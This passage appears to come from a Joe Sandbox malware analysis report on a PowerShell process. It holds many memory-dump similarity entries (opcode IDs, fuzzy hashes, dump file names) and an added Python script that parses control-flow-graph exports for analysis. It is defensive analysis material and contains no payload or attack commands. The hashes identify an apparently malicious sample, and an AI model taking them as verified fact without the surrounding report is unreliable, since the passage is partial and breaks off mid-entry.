Similarity
• API ID / String ID / API String ID: (empty)
• Opcode ID: 47aee47638d58487eef6f2e2f881b9df162de66d74ecd18fc5069963fd167ca8
• Instruction ID: 276444ba8ab76f5049d6381b43cdc2a6e118f8b82fe1b8ca7b97677f47edb1be
• Opcode Fuzzy Hash: 47aee47638d58487eef6f2e2f881b9df162de66d74ecd18fc5069963fd167ca8
• Instruction Fuzzy Hash: 8451D134314305DFEB04DB69DC84A6A77EAFFC9251B1984AAD509CB791DB31DC01CBA0
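The two control_flow_graph exports above (the functions at 33929f0 and 3397740 in the powershell.exe dump based at 3390000) are flat node/edge token lists, which is hard to read but easy to parse. The script below is added here as an example; it is not part of Joe Sandbox or of this report. It turns such an export back into basic blocks and edges and derives what an analyst normally reads off the rendered graph: the entry block, the terminal blocks, the block most paths funnel into, resolved call targets, and any back edges (loops). The token grammar is an assumption inferred from these two exports only, and the names parse_cfg, summarize and back_edges are the example's own. Both dumps are embedded verbatim so the script runs offline.

```python
"""Parse Joe Sandbox `control_flow_graph ...` exports and summarise the graph.

Added example code, not Joe Sandbox's own parser. The token grammar below is
an assumption inferred from the two exports in this report:
  "<id> <hex>[-<hex>]"      basic block <id> covering that address range
  "<id> <hex> call <hex>"   block <id> whose call target was resolved
  "<a>-><b>"                control-flow edge from block a to block b
"""
import re
from collections import defaultdict

# Copied verbatim from this report (functions at 0x33929f0 and 0x3397740).
CFG_33929F0 = ("control_flow_graph 657 33929f0-3392a1e 658 3392af5-3392b37 657->658 659 3392a24-3392a3a 657->659 664 3392b3d-3392b56 658->664 665 3392c51-3392c61 658->665 660 3392a3c 659->660 661 3392a3f-3392a52 659->661 660->661 661->658 666 3392a58-3392a65 661->666 669 3392b58 664->669 670 3392b5b-3392b69 664->670 667 3392a6a-3392a7c 666->667 668 3392a67 666->668 667->658 675 3392a7e-3392a88 667->675 668->667 669->670 670->665 674 3392b6f-3392b79 670->674 676 3392b7b-3392b7d 674->676 677 3392b87-3392b94 674->677 678 3392a8a-3392a8c 675->678 679 3392a96-3392aa6 675->679 676->677 677->665 680 3392b9a-3392baa 677->680 678->679 679->658 681 3392aa8-3392ab2 679->681 682 3392bac 680->682 683 3392baf-3392bbd 680->683 684 3392ac0-3392af4 681->684 685 3392ab3-3392ab6 681->685 682->683 683->665 688 3392bc3-3392bd3 683->688 685->684 690 3392bd8-3392be5 688->690 691 3392bd5 688->691 690->665 693 3392be7-3392bf7 690->693 691->690 694 3392bf9 693->694 695 3392bfc-3392c08 693->695 694->695 695->665 697 3392c0a-3392c24 695->697 698 3392c29 697->698 699 3392c26 697->699 700 3392c2e-3392c38 698->700 699->698 701 3392c3d-3392c50 700->701")
CFG_3397740 = ("control_flow_graph 797 3397740-3397776 800 3397778-339777a 797->800 801 339777f-3397788 797->801 802 3397829-339782e 800->802 804 339778a-339778c 801->804 805 3397791-33977af 801->805 804->802 808 33977b1-33977b3 805->808 809 33977b5-33977b9 805->809 808->802 810 33977c8-33977cf 809->810 811 33977bb-33977c0 809->811 812 339782f-3397860 810->812 813 33977d1-33977fa 810->813 811->810 823 33978e2-33978e6 812->823 824 3397866-33978bd 812->824 816 3397808 813->816 817 33977fc-3397806 813->817 818 339780a-3397816 816->818 817->818 825 3397818-339781a 818->825 826 339781c-3397823 818->826 837 33978e9 call 3397938 823->837 838 33978e9 call 3397940 823->838 833 33978c9-33978d7 824->833 834 33978bf 824->834 825->802 826->802 828 33978ec-33978f1 833->823 836 33978d9-33978e1 833->836 834->833 837->828 838->828")

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


def parse_cfg(text):
    """Return ({block_id: {"start", "end", "call"}}, [(src, dst), ...])."""
    tokens = text.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a Joe Sandbox control_flow_graph export")
    blocks, edges = {}, []
    i = 1
    while i < len(tokens):
        edge = EDGE_RE.match(tokens[i])
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        if not tokens[i].isdigit() or i + 1 >= len(tokens):
            raise ValueError(f"unexpected token {tokens[i]!r} at position {i}")
        block_id = int(tokens[i])
        addr = ADDR_RE.match(tokens[i + 1])
        if not addr:
            raise ValueError(f"block {block_id}: bad address {tokens[i + 1]!r}")
        start = int(addr.group(1), 16)
        end = int(addr.group(2), 16) if addr.group(2) else start  # single-instruction block
        i += 2
        call = None
        if i + 1 < len(tokens) and tokens[i] == "call":
            call = int(tokens[i + 1], 16)
            i += 2
        blocks[block_id] = {"start": start, "end": end, "call": call}
    for a, b in edges:  # reject exports whose edges point at blocks never defined
        if a not in blocks or b not in blocks:
            raise ValueError(f"edge {a}->{b} refers to an undefined block")
    return blocks, edges


def back_edges(roots, succ):
    """Edges into a block still on the DFS stack, i.e. the loops in the graph."""
    WHITE, GREY, BLACK = 0, 1, 2
    colour = defaultdict(int)  # unvisited blocks default to WHITE
    found = []
    for root in roots:
        if colour[root] != WHITE:
            continue
        colour[root] = GREY
        stack = [(root, iter(sorted(succ[root])))]
        while stack:
            node, it = stack[-1]
            nxt = next(it, None)
            if nxt is None:
                colour[node] = BLACK
                stack.pop()
            elif colour[nxt] == GREY:
                found.append((node, nxt))
            elif colour[nxt] == WHITE:
                colour[nxt] = GREY
                stack.append((nxt, iter(sorted(succ[nxt]))))
    return found


def summarize(text):
    """Facts an analyst reads off the rendered graph, computed from the export."""
    blocks, edges = parse_cfg(text)
    succ, pred = defaultdict(set), defaultdict(set)
    for a, b in edges:
        succ[a].add(b)
        pred[b].add(a)
    entries = sorted(b for b in blocks if not pred[b])   # no predecessor: function entry
    exits = sorted(b for b in blocks if not succ[b])     # no successor: return / tail
    # The block with the most predecessors is usually the shared error path or
    # the epilogue that a chain of checks funnels into; ties go to the lower id.
    join = max(blocks, key=lambda b: (len(pred[b]), -b))
    return {
        "blocks": len(blocks),
        "edges": len(edges),
        "span": (min(v["start"] for v in blocks.values()),
                 max(v["end"] for v in blocks.values())),
        "entries": entries,
        "exits": exits,
        "join": (join, len(pred[join])),
        "calls": {b: v["call"] for b, v in blocks.items() if v["call"] is not None},
        "back_edges": back_edges(entries, succ),
    }


if __name__ == "__main__":
    for name, dump in (("sub_33929f0", CFG_33929F0), ("sub_3397740", CFG_3397740)):
        s = summarize(dump)
        print(name, f"{s['span'][0]:#x}-{s['span'][1]:#x}", s)
```

Both functions come out acyclic with a single entry and a handful of terminal blocks, and every block carrying a resolved call (837 and 838, both at 33978e9, to 3397938 and 3397940) is listed under "calls"; those are the addresses to look up next in the dump when following the PowerShell stage.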
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID / String ID / API String ID: (empty)
• Opcode ID: 409aebbfe933d2d3ff41e5ccad9e3c959be3bc3dc40122ab163b8ae5181a11d5
• Instruction ID: 015667b6c48fcc3142910c1744f987c542f598d22b959a1fa945a33a0552160f
• Opcode Fuzzy Hash: 409aebbfe933d2d3ff41e5ccad9e3c959be3bc3dc40122ab163b8ae5181a11d5
• Instruction Fuzzy Hash: 9D611471E00248CFDB14DFA9D984A9DFBF5EF88310F19812AE809AB354EB749C45CB60
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID / String ID / API String ID: (empty)
• Opcode ID: e184f140d6cb57470788657c65eacf87da86252eb50c9a34e765c7ee9db2eff4
• Instruction ID: 1910a49ed9c7ea1f97fe638c05a57d5f35071d063bd33178c2b59d27aa41a281
• Opcode Fuzzy Hash: e184f140d6cb57470788657c65eacf87da86252eb50c9a34e765c7ee9db2eff4
• Instruction Fuzzy Hash: 13511575E00248DFDB14DFA9D884A9DFBF5EF88310F18806AE809AB354EB749845CF60
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID / String ID / API String ID: (empty)
• Opcode ID: 2b3624c2738c5123b93ba2cf8a4c458427820cfe0ce5790a1c6c85c388006add
• Instruction ID: f45adf1675cec892a52041796d996bd787e88fb8e3268f6a98f77f65475212f9
• Opcode Fuzzy Hash: 2b3624c2738c5123b93ba2cf8a4c458427820cfe0ce5790a1c6c85c388006add
• Instruction Fuzzy Hash: 5D514B74700305CFDB10EB6DC8D496ABBE6EF89311B1888A9E549CF356EB30DC418BA1
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID / String ID / API String ID: (empty)
• Opcode ID: 2c27c918b0512fdc503e5975d73ba1892732321eb1f4780b05cb5cd115580316
• Instruction ID: 5be349b5a2cd4f4c3a3ae80e8ce235cb25f0c716fbb11ef52c69682501ede744
• Opcode Fuzzy Hash: 2c27c918b0512fdc503e5975d73ba1892732321eb1f4780b05cb5cd115580316
• Instruction Fuzzy Hash: BE412974700305CFDB10EB6DC9D492ABBE6EF8831575888A9E549CF355EB30EC418BA1
Memory Dump Source
• Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
Similarity
• API ID / String ID / API String ID: (empty)
• Opcode ID: 0a5843108ce1aa5da6b4bf477ee483331151f3a0c913afc50ed6643e56090ebd
• Instruction ID: b368493bfa65c6614d8cd46d1b859d3e2853a59c28ad4237a0106ce7e2f0eb2e
• Opcode Fuzzy Hash: 0a5843108ce1aa5da6b4bf477ee483331151f3a0c913afc50ed6643e56090ebd
• Instruction Fuzzy Hash: 1041D6F1B12211EFEB249F18C5006B677E2EF85340B5484D5D9088F355D739EC4ADBA1
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID / String ID / API String ID: (empty)
• Opcode ID: aa75d013f12bc63c1531297d15692629af510ad3fee1b90d743f08f7d8b40dae
• Instruction ID: 2b8e2301039b354380114c7ea5834dd43b633f82c85192984d32633be2821d2e
• Opcode Fuzzy Hash: aa75d013f12bc63c1531297d15692629af510ad3fee1b90d743f08f7d8b40dae
• Instruction Fuzzy Hash: 344126B4A00509DFDB09CF58C5D89AAFBB1FF48310B25859AC815AB364C736EC51CF90
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID / String ID / API String ID: (empty)
• Opcode ID: 94f335501fabe9e72b68517ec3bf049e0bcebbfa3923f30d8a3f853d8cc4e214
• Instruction ID: 28ab03c9a0ab3cd8ccba7cd392ba80ba1ad4ff9583c3d508ed3a3b82270b9595
• Opcode Fuzzy Hash: 94f335501fabe9e72b68517ec3bf049e0bcebbfa3923f30d8a3f853d8cc4e214
• Instruction Fuzzy Hash: 91318D353002119FD705EB78E894B9EB796EFD8212F04853DE60ACB355DF70A845CBA1
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a2d83ba4253b4f3eca3bd5f826def10e9217e0ee492d2f4fbfab43f9f696ea47
                                                                                                                                                                                                                      • Instruction ID: 6c28efe7a894f154e1fd2e4726ee42363d205a27bd1265021490aff2e986ee04
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2d83ba4253b4f3eca3bd5f826def10e9217e0ee492d2f4fbfab43f9f696ea47
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4315E34A10205CFDF14DF69D498AAEBBF2AF8D315F195099D806AB391DB35DC01CB60
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c052e82d99a84eefab9cd5b98ae5fc68ac9f8e2350cda1ad887aac273eca1d8e
                                                                                                                                                                                                                      • Instruction ID: 20b2b0f735f0dda074ebf87eeeb2753a4f49ebee7a1995d82646b39b82da6b0b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c052e82d99a84eefab9cd5b98ae5fc68ac9f8e2350cda1ad887aac273eca1d8e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D316E74E006098FEF04DF79C8946AEBBF6EF89311F14816AE505EB254EB349C418BA5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7ad93ba340ced408fcd2d86f206107e6c16bed6f1a55b1dabec966f7ff1715cf
                                                                                                                                                                                                                      • Instruction ID: c1f111feaf070db21f35c5031b5b0c451c5ba061da726b756a235726d62c6621
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ad93ba340ced408fcd2d86f206107e6c16bed6f1a55b1dabec966f7ff1715cf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA31D335908380CFDB25DF79E88469ABFF0AF06310F5484EED49AC76A2D775A805CB41
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7ae45d402dddd3cac8fbb6a99fdeb8538808635d0e004c8dea7ad4f83ad1552f
                                                                                                                                                                                                                      • Instruction ID: 077c9fede6f6c88ff9bb2f9c73a1b905814e62622fbfdfa9d7f094652fdf86ff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ae45d402dddd3cac8fbb6a99fdeb8538808635d0e004c8dea7ad4f83ad1552f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3031B6B8E003099FDB05EB64D454ABE7BB6EF85300F11C4AAD204AF395DA789D458F51
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c5a25209596b34663a2449c71e81cf53d34ce71ccb4783440f4cd34fb8684fa3
                                                                                                                                                                                                                      • Instruction ID: 6885e4d5a0f123e41df07516b679cedb46c89f5a68996a9297998c088098a19f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5a25209596b34663a2449c71e81cf53d34ce71ccb4783440f4cd34fb8684fa3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8316E74A00204CFDB18EF69D4A8A9EBBF6EF49319F14446AD806EB355DF709C81CB91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 8f421117bfbb235173e02d2f8f97f8d0eb2811bc6a053ad51e14a6f4defa6e40
                                                                                                                                                                                                                      • Instruction ID: fe3450d3823e41aba683e51a14b96489bd4c185d085860b4cd02875e89de6087
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f421117bfbb235173e02d2f8f97f8d0eb2811bc6a053ad51e14a6f4defa6e40
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D314D74E006098FEB04DF69C8947AEBBF6AF88300F14816AE505EB354EA348C418B65
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7fea6daa91aeaf9dea8964a036194ee8f7abdac032b696272c01b5f683460d17
                                                                                                                                                                                                                      • Instruction ID: 40d379b1b0f68cadee3533b41b9a10ff0562f042e2c10cb94d6e646c081af472
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fea6daa91aeaf9dea8964a036194ee8f7abdac032b696272c01b5f683460d17
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07314D74A002048FDB18DF69D498A9EBBF6EF89315F04446AD406EB351DF70AC85CB91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1385badead3133c35d9256d64fc01eb8fe574568c4376dcb5f255af0cbd8a7e2
                                                                                                                                                                                                                      • Instruction ID: 505bc694a04e7dad774dcbf1bf5a59db62e4330bde188a9a5865f343a0ec29ba
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1385badead3133c35d9256d64fc01eb8fe574568c4376dcb5f255af0cbd8a7e2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 263180B8E002099FEB44EFA4D454AAE77B2FF84300F118469D214AF394DA799D418F91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 84b59d6902ec6b646017071d50262867677dcc59313484f0530b6439fa65fc50
                                                                                                                                                                                                                      • Instruction ID: 5e11983b5031d83f9cec1b4854cf8e8feacf54dfead3815d6b2f7eed0f620f6b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84b59d6902ec6b646017071d50262867677dcc59313484f0530b6439fa65fc50
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 8bfdab19c18a347f833edd300a2cca8657c5de73fca42a637dfb011b4d86dd0c
                                                                                                                                                                                                                      • Instruction ID: 901453ef83ee9fecffa57d5e78aa164bacd568206d7868bfbf57b1096ce9d552
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bfdab19c18a347f833edd300a2cca8657c5de73fca42a637dfb011b4d86dd0c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5F0463A645654EB9F05E61AAC528EE7B9DDEC52B23000097F409CB602DA6048454BE5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2150246831.00000000032DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032DD000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_32dd000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: e2412cac67e971861c5c633a5899bb91525c42619933bfe942ba2846a554f6ac
                                                                                                                                                                                                                      • Instruction ID: 55e50c4eec0e0f5192f5a9304ee3ade453d6e99e1adc35fe3eb30310d58fd867
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2412cac67e971861c5c633a5899bb91525c42619933bfe942ba2846a554f6ac
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8012B71018B409AE710DA15ECC4B67FFDCDF91326F0CC459EC490B242C6789881C7B1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 69397eeb6b1e3e8db4a40dc6f0fa9e2944b7eeb75c71645555180cd76476f419
                                                                                                                                                                                                                      • Instruction ID: d691a71c565d3efa168162acc838aca8140ef578fc30e7b70bac5b6ffde3faf3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69397eeb6b1e3e8db4a40dc6f0fa9e2944b7eeb75c71645555180cd76476f419
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A01A77A9046449FEB11DB64D4583AA3B65DFC6324F14809FC6598B382CE396907CBA1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 13b3e4529da1baf33e2e33fd49acc671f8d9924d7e698d05d34b6fc89a709129
                                                                                                                                                                                                                      • Instruction ID: 5ea05227bed21f0024926225816e8d84aed4e3f30f5d8b5adfb5920e14ffffc2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13b3e4529da1baf33e2e33fd49acc671f8d9924d7e698d05d34b6fc89a709129
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CF028357093A05FEB008A69AC80D77BFECDFC6150B0440ABF841C7352DA70CD008760
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2150246831.00000000032DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032DD000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_32dd000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 91df9d720b87072456c99758f9e42b960e3674e310dd8e7531ebd276de17ad87
                                                                                                                                                                                                                      • Instruction ID: 22aa2db663180e40d85e02a21f333b8c4b9b42f1faa0b729119051881808234d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91df9d720b87072456c99758f9e42b960e3674e310dd8e7531ebd276de17ad87
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67015E6240E7C09ED7128B259D94B52BFA8DF53225F1DC1DBD8888F197C2699844C772
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 3c563ffc13bc65d52a345d28fd1e74ec5f53cd7812f11312bf166f75d44473d5
                                                                                                                                                                                                                      • Instruction ID: 5334d9e0689675946c6d5709e0f2916a4c616f6048e77809187fc1cb819fa543
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c563ffc13bc65d52a345d28fd1e74ec5f53cd7812f11312bf166f75d44473d5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DF0F0353067508FC712DB69D8849BF7BE9EF8A222704059EE14DCB3A2CEB09C45C361
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2150246831.00000000032DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032DD000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_32dd000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 381fa839bad7e0f4bfed849d52c23bdbefe71ec8da58a66126bbb6d958295e95
                                                                                                                                                                                                                      • Instruction ID: 3618aa346744d8e7df83dee24bd98dd85a511722c7fe1ad1ebf1ea4c68dc8168
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 381fa839bad7e0f4bfed849d52c23bdbefe71ec8da58a66126bbb6d958295e95
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86F0FF76210A00AFD710CF0AD985C63FBADEFD4674719C59AEC4A4B611C671FC42CAA0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: da130b30645b1552c625c896f80cb784b8475da2d560cf0c86bf64ef236b98ca
                                                                                                                                                                                                                      • Instruction ID: 4312474c469356da3819770ea22303a19f453cf17a1ee59999f874552ce6414f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da130b30645b1552c625c896f80cb784b8475da2d560cf0c86bf64ef236b98ca
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9F08C397042408FC700CB2DD894866BBFAAFCA61532910EAE184CB736DA61DC01CB94
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
